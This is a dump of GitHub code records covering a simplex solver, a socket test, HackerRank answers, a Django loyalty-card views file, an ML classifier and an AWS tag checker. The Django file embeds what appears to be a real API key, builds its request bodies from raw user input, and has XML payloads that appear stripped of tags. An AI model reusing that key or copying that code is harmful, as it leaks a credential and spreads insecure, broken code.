len(A)\n cols = len(A[0])\n\n N = [i for i in range(cols)]\n B = [cols + i for i in range(rows)]\n c = [c[idx] if idx < len(c) else 0 for idx in range(rows + cols)]\n new_b = [0 if idx < cols else b[idx - cols] for idx in range(rows + cols)]\n new_A = [[0 for j in range(rows + cols)] for i in range(rows + cols)]\n \n for i in range(rows):\n for j in range(cols):\n new_A[i + cols][j] = A[i][j]\n\n return N, B, new_A, new_b, c, 0\n\n\ndef pivot(N: list, B: list, A: list, b: list, c: list, v: int, l: int, e: int):\n N_new = copy.deepcopy(N)\n B_new = copy.deepcopy(B)\n A_new = [[0 for i in range(len(A[0]))] for j in range(len(A))]\n b_new = [0 for i in range(len(b))]\n c_new = [0 for i in range(len(c))]\n\n b_new[e] = b[l] / A[l][e]\n\n for j in N:\n if j != e:\n A_new[e][j] = A[l][j] / A[l][e]\n A_new[e][l] = 1 / A[l][e]\n\n for i in B:\n if i != l:\n b_new[i] = b[i] - A[i][e] * b_new[e]\n\n for j in N:\n if j != e:\n A_new[i][j] = A[i][j] - A[i][e] * A_new[e][j]\n \n A_new[i][l] = -A[i][e] * A_new[e][l]\n \n v_new = v + c[e] * b_new[e]\n\n for j in N:\n if j != e:\n c_new[j] = c[j] - c[e] * A_new[e][j]\n c_new[l] = -c[e] * A_new[e][l]\n\n if e in N:\n N_new.remove(e)\n N_new.append(l)\n\n if l in B:\n B_new.remove(l)\n B_new.append(e)\n\n return N_new, B_new, A_new, b_new, c_new, v_new\n\n\ndef simplex(N: list, B: list, A: list, b: list, c: list, v: int):\n x = list()\n\n while(True):\n delta = [0 for m in range(len(A))]\n\n e = -1\n for j in N:\n if c[j] > 0:\n e = j\n if e == -1:\n break\n \n for i in B:\n if A[i][e] > 0:\n delta[i] = b[i] / A[i][e]\n else:\n delta[i] = \"inf\"\n \n l = minimizing_index(delta, B)\n if delta[l] == \"inf\":\n raise Exception(\"Задача не ограничена\")\n else:\n N, B, A, b, c, v = pivot(N, B, A, b, c, v, l, e)\n \n for i in range(len(A)):\n if i in B:\n x.append(b[i])\n else:\n x.append(0)\n \n return x\n","repo_name":"ThinkingFrog/OptimizationMethods","sub_path":"LAB1/simplex/simplex.py","file_name":"simplex.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19955653294","text":"# Test 3\nfrom server import Server\nimport time\nimport json\nimport sys\n\ndef getargs(argv):\n args = []\n for arg in argv:\n args.append(arg)\n return args\n\n\ndef main():\n\n args = getargs(sys.argv)\n delivstate = args[1]\n ADDR = '192.168.1.123'\n PORT = 2001\n\n # Instantiate server\n s = Server(ADDR, PORT)\n s.socket_init()\n s.start()\n\n # Connect to client\n print(\"Waiting to connect ...\")\n s.connect()\n print(\"Connected to wifly at %s:%s\" % (s.client_addr[0], s.client_addr[1]))\n print()\n\n while True:\n\n # Receive messages from client\n buf = \"\"\n while '!' not in buf:\n buf += s.recvmsg()\n if \"*HELLO*\" in buf:\n buf = \"\"\n\n buf = buf[:-1]\n print(\"-----------------------------------------------------------------------------\")\n print(\"Received Message: %s\" % buf)\n print()\n #msg_count += 1\n\n json_obj = json.loads(buf)\n objheld = json_obj['DELIV_SENSE']['OBJ']\n if(int(objheld) is 1 and int(delivstate) is 1):\n print(\"turn off\")\n s.sendmsg('{\"SEQ\": 0, \"ACTION\": 0}!')\n\n if(int(objheld) is 0 and int(delivstate) is 0):\n print(\"turn on\")\n s.sendmsg('{\"SEQ\": 0, \"ACTION\": 1}!')\n\n\n s.disconnect()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"samhmcg5/embedded","sub_path":"server/KarTesting/emagtest.py","file_name":"emagtest.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"12163040718","text":"#this is the life that we all want\n\n# Enter your code here. Read input from STDIN. Print output to STDOUT\n\n# Enter your code here. Read input from STDIN. Print output to STDOUT\n\nword = []\nwordy = ()\nallwords = \"\"\nfor _ in range(int(input())):\n word.append(input().strip())\n \nfor i in word:\n if i not in wordy:\n wordy += i,\nprint(len(wordy))\nprint(*[word.count(k) for k in wordy])\n\n\n#second solution by me\n# Enter your code here. Read input from STDIN. Print output to STDOUT\n\nvocab = {}\nfor x in range(int(input())):\n k = input().strip()\n if k in vocab.keys():\n vocab[k] += 1\n else:\n vocab[k] = 1\nprint(len(vocab.keys()))\nprint(*vocab.values())\n\n\n\n# Enter your code here. Read input from STDIN. Print output to STDOUT from poorcoder\n\nvocab = {}\nfor i in range(int(input())):\n value = input()\n if not vocab.get(value, None):\n vocab[value]= 1\n else:\n vocab[value]+= 1\n\nprint(len(vocab))\nprint(*vocab.values())","repo_name":"hamzayn/My_HackerRank_Solutions","sub_path":"word_order.py","file_name":"word_order.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34033286892","text":"from django.shortcuts import render\nfrom django.http import HttpResponse,JsonResponse\nfrom django.views.decorators.csrf import csrf_protect\nfrom .models import Article, Story, BigDiscount, CrazySale, Category, Likedapp\nimport pdb, xmltodict, json\nimport requests\nfrom django import template\nimport base64\nfrom base64 import b64encode\n# from robokassa.forms import RobokassaForm\n\n\nfrom django.core import serializers\n\n\n\n# import pdb; pdb.set_trace()\n\ndef year_archive(request, year):\n a_list = Article.objects.filter(pub_date__year=year)\n context = {'year': year, 'article_list': a_list}\n return render(request, 'news/year_archive.html', context)\n\n\ndef month_archive(request, year, month):\n a_list = Article.objects.filter(pub_date__month=month)\n context = {'year': year, 'month': month, 'article_list': a_list}\n return render(request, 'news/month_archive.html', context)\n\ndef single_archive(request, idef):\n a_list = Article.objects.get(id=idef)\n context = {'idef': idef, 'article': a_list}\n return render(request, 'news/single_archive.html', context)\n\n\n\n\ndef main(request):\n stories = Story.objects.all()\n big_discs = BigDiscount.objects.all()\n crazySales = CrazySale.objects.all()\n categories = Category.objects.all()\n bonus_account = None\n userStory = []\n\n\n\n if 'Auth' in request.session:\n story_ge = requests.get(\"https://ipgeolocation.abstractapi.com/v1/?api_key=343192254d7649e7aed2655a9673c247\")\n \n\n story_data = story_ge.json()\n\n # print(data)\n print(story_data)\n\n\n \n\n\n\n\n userStory.append({'story': story_data})\n \n print('-------2-----')\n if 'storyuser' in request.session:\n\n # sessionlist = request.session['storyuser']\n # sessionlist.append(userStory)\n\n\n # sessionlist = request.session.get('storyuser')\n # sessionlist.append(userStory)\n\n print(request.session['storyuser'])\n\n else:\n request.session['storyuser'] = userStory\n print(request.session['storyuser'])\n\n\n\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n \n\n obj_req = requests.post('http://91.103.111.34:9192/', data = '''\n \n \n Account, Holder_Card, Holder_Coupon, Holder_Contact, Holder_Coupon_Available\n \n '''+request.session['Auth']+'''\n \n \n ''', headers=headers)\n \n if obj_req.status_code == 200:\n\n print(obj_req.status_code)\n\n else:\n print(obj_req.status_code)\n\n\n obj = xmltodict.parse(obj_req.content)\n\n if 'Holder' in obj:\n\n request.session['HolderID'] = obj['Holder']['Holder_ID']\n\n \n cart = obj['Holder']['Holders_Cards']['Holder_Card']['Card']['Card_Code']\n \n\n\n bonus = obj['Holder']['Accounts']['Account']\n\n account = obj['Holder']\n\n\n if bonus:\n print(bonus)\n\n \n for val in bonus:\n # print(val['Balance'])\n if val['Account_Type_ID'] == '1':\n \n bonus_account = val['Balance']\n\n \n\n if not cart:\n qrcode = obj['Holder']['Holders_Cards']['Holder_Card']['Card']['Card_Code']\n else:\n qrcode = 0 \n\n if account:\n auth = True\n phoneCart = request.session['Auth']\n\n \n context = {'stories': stories, 'big_discs': big_discs, 'crazySales': crazySales, 'categories': categories, 'auth':auth, 'qrcode':qrcode, 'bonus_account':bonus_account, 'account':account, 'cart':cart, 'phonecart':phoneCart}\n \n else:\n auth = False\n qrcode = False\n print('User not register.')\n context = {'stories': stories, 'big_discs': big_discs, 'crazySales': crazySales, 'categories': categories, 'auth':auth, 'qrcode':qrcode, 'bonus_account':bonus_account}\n \n else:\n auth = False\n qrcode = False\n context = {'stories': stories, 'big_discs': big_discs, 'crazySales': crazySales, 'categories': categories, 'auth':auth, 'qrcode':qrcode}\n else:\n auth = False\n qrcode = False\n context = {'stories': stories, 'big_discs': big_discs, 'crazySales': crazySales, 'categories': categories, 'auth':auth, 'qrcode':qrcode}\n\n return render(request, 'news/main.html', context)\n\ndef testUser(request):\n fav_color = request.session['fav_color']\n return JsonResponse({'session':fav_color})\n\ndef test(request):\n\n url='http://91.103.111.34:9192/'\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n # Истории заказов тест\n\n obj_req = requests.post('http://91.103.111.34:9192/', data = '''\n \n \n Account, Holder_Card, Holder_Coupon, Holder_Coupon_Available\n \n '''+request.session['Auth']+'''\n \n \n ''', headers=headers)\n\n\n \n\n\n\n\n\n obj = xmltodict.parse(obj_req.content)\n\n \n return JsonResponse({'session':obj})\n\n # print(obj[\"employees\"][\"employee\"]['role'])\n\n # return render(request, 'testing/test.html', {'obj':obj})\n\n\n@csrf_protect\ndef getphonekey(request):\n\n if request.method == 'POST':\n phone = request.POST['phone']\n\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n obj_req = requests.post('http://91.103.111.34:9192/', data = '''\n \n \n ''' + phone + '''\n Code_Timeout\n ''', headers=headers)\n # print('1')\n\n\n obj = xmltodict.parse(obj_req.content)\n\n if 'Registration' in obj or 'Login' in obj:\n err = {'success':True, 'obj':obj}\n else:\n\n err = {'success':False, 'obj':obj}\n\n return JsonResponse(err)\n\n\n\n@csrf_protect\ndef checkphonekey(request):\n\n if request.method == 'POST':\n phone = request.POST['phone']\n keysms = request.POST['keysms']\n res = {}\n\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n obj_req = requests.post('http://91.103.111.34:9192/', data = '''\n \n \n '''+phone+'''\n\n '''+keysms+'''\n ''', headers=headers)\n\n obj = xmltodict.parse(obj_req.content)\n userStory = {}\n \n\n # obj = None\n\n if 'Data' not in obj:\n\n \n res = {'success': False, 'response':obj}\n\n if 'Card_Code' in obj['Holder']['Cards']['Card']:\n\n request.session['Auth'] = phone\n\n\n print('-------1-----')\n\n print(phone)\n\n \n res = {'success': True}\n else:\n res = {'success': False, 'response':obj} \n\n else:\n\n if '@ErrorCode' not in obj['Data']:\n\n\n \n\n\n\n \n\n\n\n request.session['Auth'] = phone\n\n\n \n\n # request.session['HolderID'] = obj\n res = {'success': True}\n else:\n res = {'success': False, 'response':obj}\n \n\n return JsonResponse(res)\n \n@csrf_protect\ndef profile(request):\n if request.method == 'POST':\n\n arr = {}\n if 'Auth' in request.session:\n\n auth = request.session['Auth']\n\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n obj_req = requests.post('http://91.103.111.34:9192/', data = '''\n \n \n Account, Holder, Holder_Address, Holder_Image, Holder_Contact\n \n '''+auth+'''\n \n ''', headers=headers)\n\n obj = xmltodict.parse(obj_req.content)\n\n arr = {'success':True,'object':obj, 'auth':auth}\n \n else:\n\n\n arr = {'success':False}\n print('User not register.')\n\n return JsonResponse(arr)\n \ndef saveprofile(request):\n if request.method == 'POST':\n if 'Auth' in request.session:\n auth = request.session['Auth']\n\n l_name = request.POST['l_name']\n f_name = request.POST['f_name']\n birthday = request.POST['birthday']\n gender = request.POST['gender']\n email_name = request.POST['email_name']\n\n\n if email_name != '':\n mailVal = '''\n \n \n 1\n '''+email_name+'''\n True\n \n '''\n else:\n\n mailVal = ''\n\n\n\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n \n text = '''\n \n \n Holder, Holder_Address, Holder_Image, Holder_Contact\n \n \n '''+auth+'''\n '''+f_name+'''\n '''+l_name+'''\n '''+birthday+'''\n '''+gender+'''\n\n\n \n \n '''+mailVal+'''\n\n\n \n\n \n\n '''\n\n obj_req = requests.post('http://91.103.111.34:9192/', data = text.encode('utf-8'), headers=headers)\n\n obj = xmltodict.parse(obj_req.content)\n\n else:\n print('User not register.')\n\n return JsonResponse({'success':True,'object':obj})\n \n\ndef generateqrcode(request):\n if request.method == 'POST':\n if 'Auth' in request.session:\n auth = request.session['Auth']\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n\n text = '''\n \n \n Holder_Card\n \n '''+auth+'''\n \n \n \n '''\n\n obj_req = requests.post('http://91.103.111.34:9192/', data = text.encode('utf-8'), headers=headers)\n\n obj = xmltodict.parse(obj_req.content)\n\n arr = {'success':True,'object':obj}\n\n else:\n print('User not register.')\n arr = {'success':False}\n\n return JsonResponse(arr)\n\ndef logoutprofile(request):\n if request.method == 'POST':\n if 'Auth' in request.session:\n del request.session['Auth']\n\n\n return JsonResponse({'success':True})\n\n@csrf_protect\ndef gethistory(request):\n\n if request.method == 'POST':\n if 'Auth' in request.session:\n\n print('1')\n\n arr = {'success': True}\n\n\n url='http://91.103.111.34:9192/'\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n # Истории заказов тест\n\n obj_req = requests.post(url, data = '''\n \n \n \n \n '''+request.session['HolderID']+'''\n 10000\n Transaction_DopInfo\n \n ''', headers=headers)\n\n obj = xmltodict.parse(obj_req.content)\n arr = {}\n\n array = []\n\n pay = []\n\n if 'Transaction' in obj['Transactions']:\n \n \n\n\n writeoff = []\n if len(obj['Transactions']['Transaction']) > 16:\n for val in obj['Transactions']['Transaction']:\n print('------------------------')\n\n \n \n\n if val['Transaction_Type'] == '22':\n if 'External_ID' in val:\n print(val['External_ID'])\n writeoff.append(val['External_ID'])\n \n \n if val['Transaction_Type'] == '11':\n if 'External_ID' in val:\n print(val['External_ID'])\n\n if val['External_ID'] in writeoff:\n # print(val['External_ID'])\n print(val)\n \n else:\n \n data = base64.b64decode(val['Dop_Info']['#text'])\n array.append(xmltodict.parse(data))\n\n if val['Transaction_Type'] == '12':\n print(val['Summ'])\n\n pay.append({'summa':val['Summ'], 'time':val['Transaction_Time'], 'name':val['Operation_Type_Name']})\n else:\n\n \n if obj['Transactions']['Transaction']['Transaction_Type'] == '12':\n print(obj['Transactions']['Transaction']['Summ'])\n pay.append({'summa':obj['Transactions']['Transaction']['Summ'], 'time':obj['Transactions']['Transaction']['Transaction_Time'], 'name':obj['Transactions']['Transaction']['Operation_Type_Name']})\n\n \n\n \n\n #print(val['Dop_Info']['#text'])\n \n \n # arr.update({'checkes': xmltodict.parse(data)})\n\n if not array and not pay:\n story_arr = {'success': False, 'story': obj}\n\n \n else:\n story_arr = {'success': True, 'story': array,'pay':pay, 'obj': obj, 'arrNote':writeoff}\n print()\n\n else:\n story_arr = {'success': False, 'obj': obj} \n\n\n else:\n story_arr = {'success': False}\n\n\n return JsonResponse(story_arr)\n\n\ndef getgifts(request):\n\n if request.method == 'POST':\n if 'Auth' in request.session:\n auth = request.session['Auth']\n\n url='http://91.103.111.34:9192/'\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n # Истории заказов тест\n\n obj_req = requests.post(url, data = '''\n \n \n\n '''+request.session['HolderID']+'''\n Holder_Coupon, Holder_Coupon_Available\n \n\n \n ''', headers=headers)\n obj = xmltodict.parse(obj_req.content)\n\n\n\n\n return JsonResponse({'success': True, 'coupons':obj['Holder']['Holders_Coupons']})\n\n\n\n\n\n\ndef market(request):\n\n # a_list = Article.objects.all()\n\n\n # url='http://ugits.net:1143/'\n # headers = {\n # 'Message-ID': '1',\n # 'Message-Type': 'Request',\n # 'Time': '2010-01-26 13:57:23',\n # 'Terminal-Type': '333',\n # 'Content-Length': '210',\n # 'Content-Type': 'text/text; charset=utf-8',\n\n # }\n\n # # Истории заказов тест\n\n # obj_req = requests.post(url, data = '''\n # \n # \n # \n # ''', headers=headers)\n # obj = xmltodict.parse(obj_req.content)\n\n\n\n\n # return JsonResponse({'success': True, 'coupons':obj})\n\n\n obj_req = requests.get('https://web-menu.stop.cash/api/v1/products?sn=AW38CB461SD4GH4N')\n # context = {'obj_req': obj_req}\n\n \n\n products = {'products': obj_req.json()}\n\n\n \n\n print(products)\n\n\n # return HttpResponse(obj_req, content_type=\"application/json\")\n return render(request, 'markets/market.html', products)\n\n\ndef likedapp(request):\n if request.method == 'POST':\n comment = Likedapp(theme= request.POST['title'], content=request.POST['content'])\n comment.save()\n\n return JsonResponse({'success': True})\n\n\n\n\n\ndef menuView(request):\n\n\n obj_req = requests.get('https://web-menu.stop.cash/api/v1/products?sn=AW38CB461SD4GH4N')\n\n return JsonResponse({'success': True, 'arr': obj_req})\n\n\n\ndef inactiveCart(request):\n\n if 'Auth' in request.session:\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n \n\n obj_req = requests.post('http://91.103.111.34:9192/', data = '''\n \n \n Holder_Card\n \n '''+request.session['Auth']+'''\n \n \n ''', headers=headers)\n \n if obj_req.status_code == 200:\n\n print(obj_req.status_code)\n\n else:\n print(obj_req.status_code)\n \n obj = xmltodict.parse(obj_req.content)\n\n cart = obj['Holder']['Holders_Cards']['Holder_Card']['Card']['Card_Code']\n\n if cart:\n\n req_incative = requests.post('http://91.103.111.34:9192/', data = '''\n \n \n '''+cart+'''\n ''', headers=headers)\n \n print(req_incative.status_code)\n\n if req_incative.status_code == 200:\n print(obj['Holder']['Holders_Cards']['Holder_Card']['Card']['Status'])\n\n status_cart = obj['Holder']['Holders_Cards']['Holder_Card']['Card']['Status']\n\n context = {'success': True, 'cart':cart, 'status':'Inactive'}\n else:\n print('error')\n\n\n return JsonResponse(context)\n\n\ndef activeCart(request):\n\n\n if 'Auth' in request.session:\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n \n\n obj_req = requests.post('http://91.103.111.34:9192/', data = '''\n \n \n Holder_Card\n \n '''+request.session['Auth']+'''\n \n \n ''', headers=headers)\n\n obj = xmltodict.parse(obj_req.content)\n\n cart = obj['Holder']['Holders_Cards']['Holder_Card']['Card']['Card_Code']\n\n if cart:\n\n req_aсtive = requests.post('http://91.103.111.34:9192/', data = '''\n \n \n '''+cart+'''\n ''', headers=headers)\n \n print(req_aсtive.status_code)\n\n if req_aсtive.status_code == 200:\n print(obj['Holder']['Holders_Cards']['Holder_Card']['Card']['Status'])\n\n status_cart = obj['Holder']['Holders_Cards']['Holder_Card']['Card']['Status']\n\n context = {'success': True, 'cart':cart, 'status':'active'}\n else:\n context = {'success': False}\n print('error')\n\n\n \n\n return JsonResponse(context)\n\n\n\n\n\n","repo_name":"andreysergeev98/licey","sub_path":"articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":24415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73490481129","text":"#import libraries and load data from database\nimport sys\nimport pandas as pd\nimport numpy as np\nimport pickle\nfrom sqlalchemy import create_engine\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\nfrom sklearn.pipeline import Pipeline #, FeatureUnion\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.multioutput import MultiOutputClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.metrics import classification_report\n\ndef load_data(database_filepath):\n '''\n Load the data from SQL Database and transform it to a data frame. Divide dataframe into X and Y.\n\n Input:\n database_filepath - filepath to the SQL database\n\n Returns:\n X - the messages to be categorized\n Y - the categories of the messages\n col_names - the names of the categories\n '''\n engine = create_engine('sqlite:///'+database_filepath)\n df = pd.read_sql_table('messages', con= engine)\n X = df['message'].values\n Y = df.drop(columns=['id','message','original','genre'])\n col_names=list(Y.columns)\n return X,Y,col_names\n\n\ndef tokenize(text):\n '''\n Tokenize text to process text data\n\n Input:\n text - a string to tokenize\n\n Returns:\n the tokens of the text\n '''\n tokens = []\n for tok in word_tokenize(text):\n tokens.append(WordNetLemmatizer().lemmatize(tok.lower().strip()))\n return tokens\n\n\ndef build_model():\n '''\n Build the model using a pipleine and GridSearch.\n\n Returns:\n model with defined GridSearch parameters\n '''\n # Build a machine learning pipeline\n pipeline = Pipeline([ \n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('mclf', MultiOutputClassifier(AdaBoostClassifier()))\n ])\n #Improve model with Grid Search\n parameters = {\n 'tfidf__smooth_idf': (True, False),\n 'mclf__estimator__n_estimators': (25, 50)\n }\n cv = GridSearchCV(pipeline, param_grid=parameters)\n return cv\n\n\n\ndef evaluate_model(model, X_test, Y_test, category_names):\n '''\n Evaluate the model and print accuracy, precision, recall and f1-score for each category\n\n Input:\n model - transformed and fitted model\n X_test - the X values to be tested (the messages)\n Y_test - the Y values with the correct categories\n category_names - the names of the categories as list\n '''\n # Evaluate and print results\n Y_pred = pd.DataFrame(model.predict(X_test))\n for i in range(35):\n print(category_names[i])\n cl = classification_report(Y_test.iloc[:,i], Y_pred.iloc[:,i],output_dict=True)\n try:\n print(\" Accuracy: {:.4f}% Precision:{:.4f}% Recall: {:.4f}% f1: {:.4f}\".\n format(cl.get('accuracy'),cl.get('1').get('precision'),\n cl.get('1').get('recall'),cl.get('1').get('f1-score')))\n except:\n print(\" Accuracy: {:.4f}% Precision:{} Recall: {} f1: {}\".\n format(cl.get('accuracy'),' - ',' - ',' - '))\n\n\ndef save_model(model, model_filepath):\n '''\n Saves the model to a pickle-file to a defined path.\n\n Input:\n model - transformed and fitted model\n model_filepath - the path of the pickle file\n '''\n # Save model in Pickle file\n pickle.dump(model, open(model_filepath, 'wb'))\n\n\ndef main():\n '''\n split the data into a training set and a test set. \n create a machine learning pipeline that uses NLTK, as well as scikit-learn's Pipeline and GridSearchCV to output a final model that uses the message column to predict classifications for 36 categories\n export your model to a pickle file\n '''\n if len(sys.argv) == 3:\n database_filepath, model_filepath = sys.argv[1:]\n print('Loading data...\\n DATABASE: {}'.format(database_filepath))\n X, Y, category_names = load_data(database_filepath)\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)\n \n print('Building model...')\n model = build_model()\n \n print('Training model...')\n model.fit(X_train, Y_train)\n \n print('Evaluating model...')\n evaluate_model(model, X_test, Y_test, category_names)\n\n print('Saving model...\\n MODEL: {}'.format(model_filepath))\n save_model(model, model_filepath)\n\n print('Trained model saved!')\n\n else:\n print('Please provide the filepath of the disaster messages database '\\\n 'as the first argument and the filepath of the pickle file to '\\\n 'save the model to as the second argument. \\n\\nExample: python '\\\n 'train_classifier.py data/DisasterResponse.db classifier.pkl')\n\n\nif __name__ == '__main__':\n main()","repo_name":"msenser/disaster_response_pipeline_project","sub_path":"models/train_classifier.py","file_name":"train_classifier.py","file_ext":"py","file_size_in_byte":4859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31349331327","text":"# This script look for missing tags on EC2 instances\n# Initialize 5 Environment variables tag1...tag5\n# Usual tags to check can be as follows\n# - cpm backup\n# - monitor_site24x7\n# - Project\n# - Environment\n# - Owner\n\nimport boto3\nimport logging\nimport os\n\nlambda_func_name = os.getenv(\"AWS_LAMBDA_FUNCTION_NAME\", \"\")\n\nif lambda_func_name == \"\": # We are not running in AWS\n boto3.setup_default_session(profile_name='iconwater')\n\n# setup simple logging for INFO\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n# define the connection\nec2 = boto3.resource('ec2')\n\ndef send_alert(alert_data):\n \n topic_arn = os.getenv(\"TopicARN\", \"\")\n \n if topic_arn == \"\":\n print(\"send_alert: Missing topic ARN. Returning without sending alert.\")\n return\n\n subject = os.getenv('CustomerID', '') + \" - Missing EC2 Instances Tag Check\"\n message = \"Missing EC2 Instances Tag Check Results: \\n\\n\" + alert_data\n\n print(\"send_alert: *** Sending alert ***\")\n print(\"send_alert: Message: {0}\".format(message))\n\n client = boto3.client('sns')\n response = client.publish(TargetArn=topic_arn, \n Message=message, \n Subject=subject)\n\ndef find_instances_with_missing_tags(tag_to_check):\n\n result_str = \"\"\n\n client = boto3.client('ec2')\n\n client = boto3.client('ec2', region_name='ap-southeast-2')\n # Check running or stopped instances\n response = client.describe_instances(\n Filters=[\n {\n 'Name': 'instance-state-name',\n 'Values': ['running', 'stopped']\n }\n ])\n # Iterate over instance(s)\n for r in response['Reservations']:\n for inst in r['Instances']:\n inst_id = inst['InstanceId']\n tags = inst['Tags']\n # Check the Name tag\n for tag in tags:\n if 'Name' in tag['Key']:\n ins_name = (tag['Value'])\n break\n else:\n ins_name = \"{No-Name}\"\n\n for tag in tags:\n if tag_to_check in tag['Key']:\n ins_tag = (tag['Value'])\n break\n else:\n ins_tag = \"NA\"\n\n if ins_tag == \"NA\":\n s = \"Tag '{}' missing for instance {} ({})\\n\\n\".format(tag_to_check, ins_name, inst['InstanceId'])\n #print (s)\n result_str = result_str + s\n #else:\n # print(\"Tag '{}' present for instance {} ({})\".format(tag_to_check, ins_name, inst['InstanceId']))\n\n return result_str\n\ndef lambda_handler(event, context):\n \n tag1 = os.getenv(\"tag1\", \"\")\n tag2 = os.getenv(\"tag2\", \"\")\n tag3 = os.getenv(\"tag3\", \"\")\n tag4 = os.getenv(\"tag4\", \"\")\n tag5 = os.getenv(\"tag5\", \"\")\n\n s = \"\"\n\n if tag1 != \"\": s = s + find_instances_with_missing_tags(tag1)\n if tag2 != \"\": s = s + find_instances_with_missing_tags(tag2)\n if tag3 != \"\": s = s + find_instances_with_missing_tags(tag3)\n if tag4 != \"\": s = s + find_instances_with_missing_tags(tag4)\n if tag5 != \"\": s = s + find_instances_with_missing_tags(tag5)\n\n if s != \"\":\n print(s)\n send_alert(s)\n\n return 0\n\nif __name__ == \"__main__\":\n lambda_handler(0, 0)\n","repo_name":"shariqmus/work-examples","sub_path":"monitoring/kms-mandatory-tags-check-tool/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70579758568","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@Author : Zijian Huang\n@Contact : zijian_huang@sjtu.edu.cn\n@FileName: costFunctionReg.py\n@Time : 20-1-10 下午1:27\n\"\"\"\nimport numpy as np\nfrom sigmoid import sigmoid\n\n\ndef costFunctionReg(theta, X, y, reg_factor, requires_grad=False):\n m = len(y)\n h = sigmoid(X @ theta)\n J = -1.0 / m * (y.T @ np.log(h) + (1 - y).T @ np.log(1 - h)) \\\n + reg_factor / (2.0 * m) * theta[1:].T @ theta[1:]\n if requires_grad:\n grad = X.T @ (h - y) / m\n grad[1:] = grad[1:] + reg_factor * theta[1:] / m\n return J, grad\n else:\n return J\n\n","repo_name":"Closedboy/Machine-Learning-exercise-python","sub_path":"ex3/costFunctionReg.py","file_name":"costFunctionReg.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2959859433","text":"class Solution:\n def removeAdj(self,v,n):\n # Your code goes here\n stack = []\n for e in v:\n if len(stack) == 0:\n stack.append(e)\n else:\n top = stack[-1]\n if top == e:\n stack.pop()\n else:\n stack.append(e)\n \n return len(stack)\n \n\n#{ \n# Driver Code Starts\n\n\nif __name__=='__main__':\n tcs=int(input())\n\n for _ in range(tcs):\n n=int(input())\n v=[x for x in input().split()]\n ob = Solution()\n print(ob.removeAdj(v,n))\n# } Driver Code Ends","repo_name":"gorebhaven7/DSA-EASY","sub_path":"3.Stack/3.String Manupulation/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41629550884","text":"#virtualenv venv\n#source version/bin/activate.fish\n#pip install requests\n#pip install python-dotenv\n#pip freeze> requerements.txt\n#Perekluchit interpritator\n\nimport requests\nfrom dotenv 